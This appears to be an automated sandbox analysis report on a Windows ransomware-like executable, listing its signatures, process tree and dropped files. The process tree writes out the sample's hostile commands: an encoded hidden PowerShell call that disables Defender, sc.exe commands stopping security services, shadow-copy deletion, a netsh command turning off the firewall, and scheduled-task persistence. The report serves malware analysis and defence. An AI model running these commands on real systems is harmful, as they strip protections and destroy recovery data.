Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    28/08/2026, 08:41

General

  • Target
    socolive1.bio_hyber.exe
  • Size 49KB
  • Sample260828-klrc2scd35
  • SHA256 1ce846208bd5e779b088e02ba747816eba96e23a36919c636e440600d3f236a0
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Creates a file in the Startup directory 1 TTPs 64 IoCs

    A file was written to a Windows startup folder. Files in these directories are executed automatically when a user logs on or an application initializes.

  • Disables service(s) 3 TTPs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Stops running service(s) 4 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Discovers running processes 1 TTPs 1 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Drops file in System32 directory 3 IoCs
  • Executes a VBScript file via the Windows Script Host. 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Executes a command shell one-liner 1 TTPs 7 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 16 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe
    "C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe"
    1⤵
    • Modifies Windows Defender DisableAntiSpyware settings
    • Disables RegEdit via registry modification
    • Drops file in Drivers directory
    • Checks computer location settings
    • Creates a file in the Startup directory
    • Adds Run key to start application
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:6004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6052
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop wscsvc
      2⤵
      • Launches sc.exe
      PID:1744
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config wscsvc start= disabled
      2⤵
      • Launches sc.exe
      PID:1144
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop SecurityHealthService
      2⤵
      • Launches sc.exe
      PID:3632
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SecurityHealthService start= disabled
      2⤵
      • Launches sc.exe
      PID:5240
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop WinDefend
      2⤵
      • Launches sc.exe
      PID:2036
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:2152
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop MsMpSvc
      2⤵
      • Launches sc.exe
      PID:5888
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config MsMpSvc start= disabled
      2⤵
      • Launches sc.exe
      PID:5976
    • C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe
        "C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe"
        3⤵
          PID:2852
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
        2⤵
        • Executes a VBScript file via the Windows Script Host.
        PID:4480
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "SysUpdateTask" /tr "C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe" /sc onlogon /f
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2340
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          3⤵
            PID:5888
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\del.bat" "
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            3⤵
              PID:2152
            • C:\Windows\system32\vssadmin.exe
              vssadmin delete shadows /all /quiet
              3⤵
              • Interacts with shadow copies
              PID:4780
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic shadowcopy delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5436
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c systeminfo > "C:\ProgramData\SysUpdate\Logs\sysinfo.txt"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:5228
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              3⤵
              • Gathers system information
              PID:952
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c tasklist > "C:\ProgramData\SysUpdate\Logs\tasklist.txt"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:1792
            • C:\Windows\system32\tasklist.exe
              tasklist
              3⤵
              • Discovers running processes
              • Suspicious use of AdjustPrivilegeToken
              PID:5172
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c whoami > "C:\ProgramData\SysUpdate\Logs\whoami.txt"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:3244
            • C:\Windows\system32\whoami.exe
              whoami
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2968
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c net user > "C:\ProgramData\SysUpdate\Logs\netuser.txt"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\system32\net.exe
              net user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5136
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:3312
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ipconfig /all > "C:\ProgramData\SysUpdate\Logs\ipconfig.txt"
              2⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5392
              • C:\Windows\system32\ipconfig.exe
                ipconfig /all
                3⤵
                • Gathers network information
                PID:5208
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c netstat -an > "C:\ProgramData\SysUpdate\Logs\netstat.txt"
              2⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5828
              • C:\Windows\system32\NETSTAT.EXE
                netstat -an
                3⤵
                • Gathers network information
                • Suspicious use of AdjustPrivilegeToken
                PID:648
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "RansomwareCheck" /tr "C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe" /sc daily /f
              2⤵
              • Scheduled Task/Job: Scheduled Task
              PID:116
            • C:\Windows\System32\wscript.exe
              "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
              2⤵
              • Executes a VBScript file via the Windows Script Host.
              PID:3832
            • C:\Windows\System32\notepad.exe
              "C:\Windows\System32\notepad.exe"
              2⤵
                PID:5588
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                2⤵
                • Interacts with shadow copies
                PID:3016
              • C:\Windows\System32\wbem\WMIC.exe
                "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1908
              • C:\Windows\System32\net.exe
                "C:\Windows\System32\net.exe" stop srservice
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:6052
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop srservice
                  3⤵
                    PID:4724
                • C:\Windows\System32\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
                  2⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:5176
                • C:\Windows\System32\sc.exe
                  "C:\Windows\System32\sc.exe" config i8042prt start= disabled
                  2⤵
                  • Launches sc.exe
                  PID:548
                • C:\Windows\System32\sc.exe
                  "C:\Windows\System32\sc.exe" stop i8042prt
                  2⤵
                  • Launches sc.exe
                  PID:2300
              • C:\Windows\system32\LogonUI.exe
                "LogonUI.exe" /flags:0x0 /state0:0xa391e055 /state1:0x41c64e6d
                1⤵
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:5188
              • C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe
                C:\Users\Admin\AppData\Local\Temp\socolive1.bio_hyber.exe
                1⤵
                  PID:1812
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5552

                Network

                      MITRE ATT&CK Enterprise v16

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      invoice_1.pdf

                      • Path C:\ProgramData\invoice_1.pdf
                      • Size 66KB
                      • SHA256 2b1d49803b1b946d8136803328063e2463a4f201189a9b0f937a3d89d623e691
                      • MD5 SHA1 SHA512 SSDEEP TLSH

                      doc_3.pdf

                      • Path C:\SystemVolumeInformation\doc_3.pdf
                      • Size 66KB
                      • SHA256 da2d447fe9858808afaef297ef3d222e6927c6ecf7b6287032c1ec2318aa9ad0
                      • MD5 SHA1 SHA512 SSDEEP TLSH

                      socolive1.bio_hyber.exe.log

                      • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\socolive1.bio_hyber.exe.log
                      • Size 660B
                      • SHA256 f424c891fbc7385e9826beed2dd8755aeac5495744b5de0a1e370891a7beaf7a
                      • MD5 SHA1 SHA512 TLSH

                      __PSScriptPolicyTest_devoq4ri.jbx.ps1

                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_devoq4ri.jbx.ps1
                      • Size 60B
                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                      • MD5 SHA1 SHA512 TLSH

                      createshortcut.vbs

                      • Path C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
                      • Size 244B
                      • SHA256 7ddf63db9218b36f4307ba33a683b696bf264a71ea4617f02189e71532026533
                      • MD5 SHA1 SHA512 TLSH

                      del.bat

                      • Path C:\Users\Admin\AppData\Local\Temp\del.bat
                      • Size 59B
                      • SHA256 a51f2a0f053ac35b4158bb02b75421ab3698e1d0ee4f926abf1bae3af1570c53
                      • MD5 SHA1 SHA512 TLSH

                      makelnk.vbs

                      • Path C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
                      • Size 245B
                      • SHA256 0dad38c1bf90703051f0fed0bcf780848a4b569b61db9875c0d6fd2eaa588e6a
                      • MD5 SHA1 SHA512 TLSH

                      sysupdate.exe

                      • Path C:\Windows\System32\sysupdate.exe
                      • Size 49KB
                      • SHA256 1ce846208bd5e779b088e02ba747816eba96e23a36919c636e440600d3f236a0
                      • MD5 SHA1 SHA512 SSDEEP TLSH

                      memory/5588-2239-0x000001E0FFFE0000-0x000001E0FFFE1000-memory.dmp

                      memory/6004-3-0x000000001E160000-0x000000001E688000-memory.dmp

                      memory/6004-0-0x0000000000440000-0x0000000000452000-memory.dmp

                      memory/6004-2-0x000000001DF90000-0x000000001E152000-memory.dmp

                      memory/6004-1-0x0000000002620000-0x0000000002630000-memory.dmp

                      memory/6004-2252-0x0000000002620000-0x0000000002630000-memory.dmp

                      memory/6052-520-0x000001C252590000-0x000001C2525B2000-memory.dmp